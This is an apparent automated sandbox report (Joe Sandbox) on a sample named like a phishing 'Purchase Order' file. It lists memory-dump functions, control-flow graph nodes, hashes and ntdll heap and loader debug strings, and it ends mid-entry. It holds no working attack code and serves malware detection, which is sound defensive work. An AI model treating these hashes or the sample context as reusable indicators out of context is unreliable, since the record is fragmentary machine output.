                                              • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                              • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                              Execution Graph

                                              Execution Coverage:0%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:1
                                              Total number of Limit Nodes:0
                                              execution_graph 68229 34852b60 LdrInitializeThunk

                                              Executed Functions

                                              Function 348535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3 348535c0-348535cc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b99c4dd2b51a20429e6178f74b9df430374e235ee233086fc0e1be3a402f8506
                                              • Instruction ID: b6e29574545d53405f7d4cea9aaa8c49d291523866a71ae958d385cfa7992a92
                                              • Opcode Fuzzy Hash: b99c4dd2b51a20429e6178f74b9df430374e235ee233086fc0e1be3a402f8506
                                              • Instruction Fuzzy Hash: 3490027160650406D1407158451470610054BD020AF65C912A5475528D8799CA9965A3
                                              Function 34852C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1 34852c70-34852c7c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2b606d97eeb3402e405ae00281af027445496f50a1ca66509e812c7b996bb1b3
                                              • Instruction ID: 7010276755b3e05b17c40a7044ae48e4de3941cee14a09affa5946ed68f864e8
                                              • Opcode Fuzzy Hash: 2b606d97eeb3402e405ae00281af027445496f50a1ca66509e812c7b996bb1b3
                                              • Instruction Fuzzy Hash: 9790027120248806D1507158840474A00054BD030AF59C912A9475618D8699C9D97122
                                              Function 34852DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2 34852df0-34852dfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: aecf001217415599d23e1bf98250c0ab523c3dee2f2da30e83eb557f5675c8a6
                                              • Instruction ID: 1364c6a68445d8ccf86fb47b746de80f0cf3a08a955c5ba95418f17e05865730
                                              • Opcode Fuzzy Hash: aecf001217415599d23e1bf98250c0ab523c3dee2f2da30e83eb557f5675c8a6
                                              • Instruction Fuzzy Hash: EE90027120240417D1517158450470700094BD024AF95C913A5475518D965ACA9AA122
                                              Function 34852B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 34852b60-34852b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cef2519f0cabb6da7332ff4dec8e0243dbd5e00155c599ff4cb1596cf2218ab3
                                              • Instruction ID: 66a133fd8a84b2529983cbf3d3ecab2fb0f596ab7440aa18d176596294af6528
                                              • Opcode Fuzzy Hash: cef2519f0cabb6da7332ff4dec8e0243dbd5e00155c599ff4cb1596cf2218ab3
                                              • Instruction Fuzzy Hash: 929002A120340007414571584414716400A4BE020AB55C522E6065550DC529C9D96126

                                              Non-executed Functions

                                              Function 348B94E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 555 348b94e0-348b9529 556 348b952b-348b9530 555->556 557 348b9578-348b9587 555->557 558 348b9534-348b953a 556->558 557->558 559 348b9589-348b958e 557->559 560 348b9540-348b9564 call 34859020 558->560 561 348b9695-348b96bd call 34859020 558->561 562 348b9d13-348b9d27 call 34854c30 559->562 569 348b9593-348b9634 GetPEB call 348bdc65 560->569 570 348b9566-348b9573 call 348d972b 560->570 571 348b96bf-348b96da call 348b9d2a 561->571 572 348b96dc-348b9712 561->572 582 348b9652-348b9667 569->582 583 348b9636-348b9644 569->583 581 348b967d-348b9690 RtlDebugPrintTimes 570->581 576 348b9714-348b9716 571->576 572->576 576->562 577 348b971c-348b9731 RtlDebugPrintTimes 576->577 577->562 587 348b9737-348b973e 577->587 581->562 582->581 586 348b9669-348b966e 582->586 583->582 584 348b9646-348b964b 583->584 584->582 588 348b9673-348b9676 586->588 589 348b9670 586->589 587->562 591 348b9744-348b975f 587->591 588->581 589->588 592 348b9763-348b9774 call 348ba808 591->592 595 348b977a-348b977c 592->595 596 348b9d11 592->596 595->562 597 348b9782-348b9789 595->597 596->562 598 348b978f-348b9794 597->598 599 348b98fc-348b9902 597->599 602 348b97bc 598->602 603 348b9796-348b979c 598->603 600 348b9908-348b9937 call 34859020 599->600 601 348b9a9c-348b9aa2 599->601 617 348b9939-348b9944 600->617 618 348b9970-348b9985 600->618 606 348b9af4-348b9af9 601->606 607 348b9aa4-348b9aad 601->607 604 348b97c0-348b9811 call 34859020 RtlDebugPrintTimes 602->604 603->602 608 348b979e-348b97b2 603->608 604->562 644 348b9817-348b981b 604->644 612 348b9ba8-348b9bb1 606->612 613 348b9aff-348b9b07 606->613 607->592 611 348b9ab3-348b9aef call 34859020 607->611 614 348b97b8-348b97ba 608->614 615 348b97b4-348b97b6 608->615 636 348b9ce9 611->636 612->592 619 348b9bb7-348b9bba 612->619 621 348b9b09-348b9b0d 613->621 622 348b9b13-348b9b3d call 348b8513 613->622 614->604 615->604 623 348b994f-348b996e 617->623 624 348b9946-348b994d 617->624 628 348b9991-348b9998 618->628 629 348b9987-348b9989 618->629 625 348b9c7d-348b9cb4 call 34859020 619->625 626 348b9bc0-348b9c0a 619->626 621->612 621->622 641 348b9d08-348b9d0c 622->641 642 348b9b43-348b9b9e call 34859020 RtlDebugPrintTimes 622->642 635 348b99d9-348b99f6 RtlDebugPrintTimes 623->635 624->623 653 348b9cbb-348b9cc2 625->653 654 348b9cb6 625->654 633 348b9c0c 626->633 634 348b9c11-348b9c1e 626->634 639 348b99bd-348b99bf 628->639 637 348b998b-348b998d 629->637 638 348b998f 629->638 633->634 647 348b9c2a-348b9c2d 634->647 648 348b9c20-348b9c23 634->648 635->562 669 348b99fc-348b9a1f call 34859020 635->669 649 348b9ced 636->649 637->628 638->628 645 348b999a-348b99a4 639->645 646 348b99c1-348b99d7 639->646 641->592 642->562 684 348b9ba4 642->684 655 348b986b-348b9880 644->655 656 348b981d-348b9825 644->656 650 348b99ad 645->650 651 348b99a6 645->651 646->635 659 348b9c39-348b9c7b 647->659 660 348b9c2f-348b9c32 647->660 648->647 658 348b9cf1-348b9d06 RtlDebugPrintTimes 649->658 663 348b99af-348b99b1 650->663 651->646 661 348b99a8-348b99ab 651->661 664 348b9ccd 653->664 665 348b9cc4-348b9ccb 653->665 654->653 668 348b9886-348b9894 655->668 666 348b9852-348b9869 656->666 667 348b9827-348b9850 call 348b8513 656->667 658->562 658->641 659->658 660->659 661->663 670 348b99bb 663->670 671 348b99b3-348b99b5 663->671 672 348b9cd1-348b9cd7 664->672 665->672 666->668 674 348b9898-348b98ef call 34859020 RtlDebugPrintTimes 667->674 668->674 687 348b9a3d-348b9a58 669->687 688 348b9a21-348b9a3b 669->688 670->639 671->670 678 348b99b7-348b99b9 671->678 679 348b9cd9-348b9cdc 672->679 680 348b9cde-348b9ce4 672->680 674->562 691 348b98f5-348b98f7 674->691 678->639 679->636 680->649 685 348b9ce6 680->685 684->612 685->636 689 348b9a5d-348b9a8b RtlDebugPrintTimes 687->689 688->689 689->562 693 348b9a91-348b9a97 689->693 691->641 693->619
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $ $0
                                              • API String ID: 3446177414-3352262554
                                              • Opcode ID: 4aeb5c70eb59ba8778f57aaf6020081c7a43c0067f36c525be3f5e528840419b
                                              • Instruction ID: d79e17883578ff9195018a5f0df235142ae6a278229de8aa371d093f94d8f95d
                                              • Opcode Fuzzy Hash: 4aeb5c70eb59ba8778f57aaf6020081c7a43c0067f36c525be3f5e528840419b
                                              • Instruction Fuzzy Hash: 4A32F1B16083818FEB50CF68C884B5BBBE5BB88344F044A2DE5D987350D7B5E94ACF52
                                              Function 34848620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1075 34848620-34848681 1076 34848687-34848698 1075->1076 1077 34885297-3488529d 1075->1077 1077->1076 1078 348852a3-348852b0 GetPEB 1077->1078 1078->1076 1079 348852b6-348852b9 1078->1079 1080 348852bb-348852c5 1079->1080 1081 348852d6-348852fc call 34852ce0 1079->1081 1080->1076 1082 348852cb-348852d4 1080->1082 1081->1076 1086 34885302-34885306 1081->1086 1084 3488532d-34885341 call 348154a0 1082->1084 1091 34885347-34885353 1084->1091 1086->1076 1088 3488530c-34885321 call 34852ce0 1086->1088 1088->1076 1097 34885327 1088->1097 1092 34885359-3488536d 1091->1092 1093 3488555c-34885568 call 3488556d 1091->1093 1095 3488538b-34885401 1092->1095 1096 3488536f 1092->1096 1093->1076 1103 3488543a-3488543d 1095->1103 1104 34885403-34885435 call 3480fd50 1095->1104 1100 34885371-34885378 1096->1100 1097->1084 1100->1095 1102 3488537a-3488537c 1100->1102 1105 3488537e-34885381 1102->1105 1106 34885383-34885385 1102->1106 1108 34885443-34885494 1103->1108 1109 34885514-34885517 1103->1109 1115 3488554d-34885552 call 3489a4b0 1104->1115 1105->1100 1106->1095 1110 34885555-34885557 1106->1110 1116 348854ce-34885512 call 3480fd50 * 2 1108->1116 1117 34885496-348854cc call 3480fd50 1108->1117 1109->1110 1111 34885519-34885548 call 3480fd50 1109->1111 1110->1091 1111->1115 1115->1110 1116->1115 1117->1115
                                              Strings
                                              • Address of the debug info found in the active list., xrefs: 348854AE, 348854FA
                                              • Critical section debug info address, xrefs: 3488541F, 3488552E
                                              • corrupted critical section, xrefs: 348854C2
                                              • Thread identifier, xrefs: 3488553A
                                              • undeleted critical section in freed memory, xrefs: 3488542B
                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 3488540A, 34885496, 34885519
                                              • Critical section address, xrefs: 34885425, 348854BC, 34885534
                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 348854CE
                                              • 8, xrefs: 348852E3
                                              • Thread is in a state in which it cannot own a critical section, xrefs: 34885543
                                              • double initialized or corrupted critical section, xrefs: 34885508
                                              • Critical section address., xrefs: 34885502
                                              • Invalid debug info address of this critical section, xrefs: 348854B6
                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 348854E2
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                              • API String ID: 0-2368682639
                                              • Opcode ID: adab426d7b787bdb67dba5565b2e471ff65f8c0effedcf1528fd859f9fc0520a
                                              • Instruction ID: 9ecf9b5091a34862c45c0d5674c59481a76db819a44cfcce530d310aea8489df
                                              • Opcode Fuzzy Hash: adab426d7b787bdb67dba5565b2e471ff65f8c0effedcf1528fd859f9fc0520a
                                              • Instruction Fuzzy Hash: 7E8169B5A02258EFEB50CF99CC44BAEBBB9BB08714F114299E504BB350D771A941CF90
                                              Function 348C0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1298 348c0274-348c0296 call 34867e54 1301 348c0298-348c02b0 RtlDebugPrintTimes 1298->1301 1302 348c02b5-348c02cd call 348076b2 1298->1302 1306 348c0751-348c0760 1301->1306 1307 348c06f7 1302->1307 1308 348c02d3-348c02e9 1302->1308 1311 348c06fa-348c074e call 348c0766 1307->1311 1309 348c02eb-348c02ee 1308->1309 1310 348c02f0-348c02f2 1308->1310 1312 348c02f3-348c030a 1309->1312 1310->1312 1311->1306 1314 348c0310-348c0313 1312->1314 1315 348c06b1-348c06ba GetPEB 1312->1315 1314->1315 1319 348c0319-348c0322 1314->1319 1317 348c06bc-348c06d7 GetPEB call 3480b970 1315->1317 1318 348c06d9-348c06de call 3480b970 1315->1318 1326 348c06e3-348c06f4 call 3480b970 1317->1326 1318->1326 1323 348c033e-348c0351 call 348c0cb5 1319->1323 1324 348c0324-348c033b call 3481ffb0 1319->1324 1332 348c035c-348c0370 call 3480758f 1323->1332 1333 348c0353-348c035a 1323->1333 1324->1323 1326->1307 1337 348c0376-348c0382 GetPEB 1332->1337 1338 348c05a2-348c05a7 1332->1338 1333->1332 1339 348c0384-348c0387 1337->1339 1340 348c03f0-348c03fb 1337->1340 1338->1311 1341 348c05ad-348c05b9 GetPEB 1338->1341 1344 348c0389-348c03a4 GetPEB call 3480b970 1339->1344 1345 348c03a6-348c03ab call 3480b970 1339->1345 1342 348c04e8-348c04fa call 348227f0 1340->1342 1343 348c0401-348c0408 1340->1343 1346 348c05bb-348c05be 1341->1346 1347 348c0627-348c0632 1341->1347 1363 348c0590-348c059d call 348c11a4 call 348c0cb5 1342->1363 1364 348c0500-348c0507 1342->1364 1343->1342 1348 348c040e-348c0417 1343->1348 1361 348c03b0-348c03d1 call 3480b970 GetPEB 1344->1361 1345->1361 1351 348c05dd-348c05e2 call 3480b970 1346->1351 1352 348c05c0-348c05db GetPEB call 3480b970 1346->1352 1347->1311 1349 348c0638-348c0643 1347->1349 1356 348c0438-348c043c 1348->1356 1357 348c0419-348c0429 1348->1357 1349->1311 1358 348c0649-348c0654 1349->1358 1371 348c05e7-348c05fb call 3480b970 1351->1371 1352->1371 1367 348c044e-348c0454 1356->1367 1368 348c043e-348c044c call 34843bc9 1356->1368 1357->1356 1365 348c042b-348c0435 call 348cdac6 1357->1365 1358->1311 1366 348c065a-348c0663 GetPEB 1358->1366 1361->1342 1392 348c03d7-348c03eb 1361->1392 1363->1338 1373 348c0509-348c0510 1364->1373 1374 348c0512-348c051a 1364->1374 1365->1356 1377 348c0665-348c0680 GetPEB call 3480b970 1366->1377 1378 348c0682-348c0687 call 3480b970 1366->1378 1380 348c0457-348c0460 1367->1380 1368->1380 1393 348c05fe-348c0608 GetPEB 1371->1393 1373->1374 1383 348c051c-348c052c 1374->1383 1384 348c0538-348c053c 1374->1384 1399 348c068c-348c06ac call 348b86ba call 3480b970 1377->1399 1378->1399 1390 348c0472-348c0475 1380->1390 1391 348c0462-348c0470 1380->1391 1383->1384 1394 348c052e-348c0533 call 348cdac6 1383->1394 1396 348c056c-348c0572 1384->1396 1397 348c053e-348c0551 call 34843bc9 1384->1397 1400 348c04e5 1390->1400 1401 348c0477-348c047e 1390->1401 1391->1390 1392->1342 1393->1311 1404 348c060e-348c0622 1393->1404 1394->1384 1403 348c0575-348c057c 1396->1403 1415 348c0563 1397->1415 1416 348c0553-348c0561 call 3483fe99 1397->1416 1399->1393 1400->1342 1401->1400 1402 348c0480-348c048b 1401->1402 1402->1400 1408 348c048d-348c0496 GetPEB 1402->1408 1403->1363 1409 348c057e-348c058e 1403->1409 1404->1311 1413 348c0498-348c04b3 GetPEB call 3480b970 1408->1413 1414 348c04b5-348c04ba call 3480b970 1408->1414 1409->1363 1423 348c04bf-348c04dd call 348b86ba call 3480b970 1413->1423 1414->1423 1421 348c0566-348c056a 1415->1421 1416->1421 1421->1403 1423->1400
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 3446177414-1700792311
                                              • Opcode ID: 318ee4cabb799d151918e4d9f1ebb01e829a0a392f6dd93abc0e47294f584be8
                                              • Instruction ID: 618a341929b5241264f0fd7a7ec16d839919b3b6ace1caf0e38c5f5b4fff3920
                                              • Opcode Fuzzy Hash: 318ee4cabb799d151918e4d9f1ebb01e829a0a392f6dd93abc0e47294f584be8
                                              • Instruction Fuzzy Hash: CED1DC75614685EFEB02CFA8C800AAAFBF1FF4A384F448259E455AB252D734DD82CF54
                                              Function 3480645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3480656C
                                                • Part of subcall function 348065B5: RtlDebugPrintTimes.NTDLL ref: 34806664
                                                • Part of subcall function 348065B5: RtlDebugPrintTimes.NTDLL ref: 348066AF
                                              Strings
                                              • apphelp.dll, xrefs: 34806496
                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34869A01
                                              • minkernel\ntdll\ldrinit.c, xrefs: 34869A11, 34869A3A
                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 348699ED
                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 34869A2A
                                              • LdrpInitShimEngine, xrefs: 348699F4, 34869A07, 34869A30
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-204845295
                                              • Opcode ID: c8af1f88f32878a45039e8bd00efd073b6de012a7f368cacdbc8f7cfe581479d
                                              • Instruction ID: 329a074d16f83d3182bd33ea7f57dc93e4e471cbde7c7be679b69d33ae93bab8
                                              • Opcode Fuzzy Hash: c8af1f88f32878a45039e8bd00efd073b6de012a7f368cacdbc8f7cfe581479d
                                              • Instruction Fuzzy Hash: 13517071218304EFF321DF24CC41A6BB7E8EB84758F404A1DE595AB2A0DA71D985CF96
                                              Function 348C12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                              • API String ID: 0-3591852110
                                              • Opcode ID: 6820a741c9dec589a8046d0832ea0ddbd876b990458fd30a4d04efd670acff41
                                              • Instruction ID: b01e1fd1d55c4f82d955f61a861d39f2f89ca3579c862dd945c33ee6374ed9ed
                                              • Opcode Fuzzy Hash: 6820a741c9dec589a8046d0832ea0ddbd876b990458fd30a4d04efd670acff41
                                              • Instruction Fuzzy Hash: 8412BA74600646EFE7158F68C480BBAFBE6EF09354F44869DE4968B642E734EC81CF90
                                              Function 34821070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3570731704
                                              • Opcode ID: eac943a796d2332f2ab1e81c0c3d6714c0e0dcd0c6a8e5297e69d2ef848dd2c7
                                              • Instruction ID: 25d33bb5da21cd7744d59bf86bebb3218561561aab3289918838a18837422337
                                              • Opcode Fuzzy Hash: eac943a796d2332f2ab1e81c0c3d6714c0e0dcd0c6a8e5297e69d2ef848dd2c7
                                              • Instruction Fuzzy Hash: B1926875A01328CFEB60CF18C890B99B7B6BF45354F1182EAE949A7291DB709EC1CF51
                                              Function 3483D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3483D959
                                                • Part of subcall function 34814859: RtlDebugPrintTimes.NTDLL ref: 348148F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1975516107
                                              • Opcode ID: 808003bf3fb75624cf6618e4be3904902c17a624fb50f656fa4691db550fbfd0
                                              • Instruction ID: 2a4deafc7dc0e10615fd94a83886d6ea2979489ae97801d804ab0282073d97d1
                                              • Opcode Fuzzy Hash: 808003bf3fb75624cf6618e4be3904902c17a624fb50f656fa4691db550fbfd0
                                              • Instruction Fuzzy Hash: 3851CBB9A09349DFEB11CFA8C48479DBBF1FF48318F244659D9106B291D7B4A886DBC0
                                              Function 348A9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                              • API String ID: 0-3063724069
                                              • Opcode ID: 75dd20ed21628c105008300de665d44333777206d14eef812cae267843286b7e
                                              • Instruction ID: 16db879ae92334690cf0b3efc13a66ca09a500410b1337fa0ac39b61fd41ced5
